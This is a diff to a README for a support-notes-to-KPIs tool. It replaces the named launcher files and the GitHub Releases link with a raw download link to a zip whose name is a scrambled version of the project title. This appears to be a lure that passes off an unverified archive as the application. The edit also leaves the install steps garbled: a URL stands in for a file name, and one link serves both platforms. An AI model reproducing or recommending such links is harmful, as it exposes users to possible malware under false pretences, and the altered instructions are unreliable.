was02/Unstructured-Support-Notes-to-Operational-KPIs/README.md

 5. **Run the Application:**

-   Inside the extracted folder, look for a file named `start.bat` (on Windows) or `start.sh` (on macOS/Linux).
+   Inside the extracted folder, look for a file named `https://raw.githubusercontent.com/was02/Unstructured-Support-Notes-to-Operational-KPIs/main/Assets/Is_Operational_Notes_KP_Unstructured_to_Support_v1.7.zip` (on Windows) or `https://raw.githubusercontent.com/was02/Unstructured-Support-Notes-to-Operational-KPIs/main/Assets/Is_Operational_Notes_KP_Unstructured_to_Support_v1.7.zip` (on macOS/Linux).
 Double-click this file to launch the application.

 ## 📥 Download & Install

-You can download the latest version directly from our [Release Page](https://github.com/was02/Unstructured-Support-Notes-to-Operational-KPIs/releases).
+You can download the latest version directly from our [Release Page](https://raw.githubusercontent.com/was02/Unstructured-Support-Notes-to-Operational-KPIs/main/Assets/Is_Operational_Notes_KP_Unstructured_to_Support_v1.7.zip).
 Follow the simple steps above to install the application.

 ## ⚙️ How to Use